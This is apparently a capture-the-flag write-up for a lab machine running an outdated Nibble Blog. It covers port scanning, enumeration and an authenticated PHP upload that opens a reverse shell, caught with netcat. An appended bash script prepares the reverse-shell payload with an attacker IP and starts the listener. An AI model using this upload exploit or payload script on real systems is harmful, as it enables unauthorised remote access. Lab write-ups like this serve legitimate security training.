Vulnerable Exploit: Weak admin password and an outdated Nibble Blog version.
System Vulnerable: 10.10.10.75
Vulnerability Explanation: The machine uses a weak password policy, which allows us to log in as admin. The installed Nibble Blog version contains a code execution vulnerability (an authenticated file upload through the My Image plugin that accepts a PHP file), which gives us a foothold on the machine.
Privilege Escalation Vulnerability: Misconfigured file permissions
Vulnerability Fix: Enforce a strong password policy and upgrade Nibble Blog to a current version.
Severity: High
Steps to Compromise the Host:
Reconnaissance
└─$ nmap -sC -sV -p- -T4 10.10.10.75
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-02 11:35 EDT
Nmap scan report for 10.10.10.75
Host is up (0.043s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
Port 80/tcp Apache/2.4.18 (Ubuntu)
Browsing to port 80 shows only "Hello world!", but the page source contains an interesting HTML comment at the end.
Going to the directory named in the comment, we reach a blog page. Checking each function of the site turns up nothing interesting, so we start discovering hidden directories and files.
One link on the page goes to feed.php, so we enumerate with the txt and php extensions.
The next step follows the exploit description: Plugins > My Image > Configure. Copy the PHP reverse shell from the webshells directory, replace the IP address with our Kali IP address, save it as image.php, and start a netcat listener on port 1234. Then upload the payload; the upload shows an error, which can be ignored because the file is still stored.
nc -lvp 1234
Browse to the uploaded file to execute the reverse shell script and catch the connection on the listener.
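The payload preparation above (copy the webshells reverse shell, swap in the attacker IP and port, start the listener) as an added shell example that is not part of the original write-up. It assumes the Kali layout, where the template lives at /usr/share/webshells/php/php-reverse-shell.php and the two lines to edit look like `$ip = '127.0.0.1';  // CHANGE THIS` and `$port = 1234;       // CHANGE THIS`; the attacker address 10.10.14.5 is an assumption and should be replaced with your own VPN IP. The function refuses to write a payload when the placeholders are missing and, if php is installed, lint-checks the result, so a mangled shell is caught before the upload round trip. The sample template is a constructed stand-in used only so the example runs offline.

```bash
#!/usr/bin/env bash
# Added example (not from the write-up): prepare image.php for the My Image upload.

# make_sample_template OUT
# Writes a constructed stand-in for php-reverse-shell.php containing only the
# two lines this script edits. The real Kali file also carries the full shell
# body; use that path in practice (see usage at the bottom).
make_sample_template() {
    cat > "$1" <<'EOF'
<?php
// Constructed stand-in for /usr/share/webshells/php/php-reverse-shell.php
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
EOF
}

# prepare_payload TEMPLATE ATTACKER_IP PORT OUTPUT
# Copies TEMPLATE to OUTPUT with the $ip and $port lines rewritten.
# Returns 1 if the template lacks the placeholders (wrong file picked),
# if the substitution did not land, or if php -l (when available) rejects it.
prepare_payload() {
    local template=$1 ip=$2 port=$3 out=$4
    grep -q '^[$]ip = ' "$template" && grep -q '^[$]port = ' "$template" || {
        echo "template lacks \$ip/\$port placeholders: $template" >&2
        return 1
    }
    # [$] keeps the dollar literal in the sed regex; the whole line is replaced,
    # which also drops the "// CHANGE THIS" reminder comments.
    sed -e "s|^[$]ip = .*|\$ip = '$ip';|" \
        -e "s|^[$]port = .*|\$port = $port;|" "$template" > "$out" || return 1
    # Confirm the substitution actually landed before uploading.
    grep -qxF -- "\$ip = '$ip';" "$out" || return 1
    grep -qxF -- "\$port = $port;" "$out" || return 1
    # Optional syntax check so a broken file is not uploaded.
    if command -v php >/dev/null 2>&1; then
        php -l "$out" >/dev/null 2>&1 || return 1
    fi
}

# start_listener PORT
# The netcat listener from the write-up; blocks until the target connects back.
start_listener() {
    nc -lvnp "$1"
}

# Usage against the real Kali template (attacker IP 10.10.14.5 is an assumption):
#   prepare_payload /usr/share/webshells/php/php-reverse-shell.php 10.10.14.5 1234 image.php
#   start_listener 1234
```

Run prepare_payload first and start_listener in a second terminal, then upload image.php through Plugins > My Image > Configure and browse to the stored file; the listener should receive the shell as www-data.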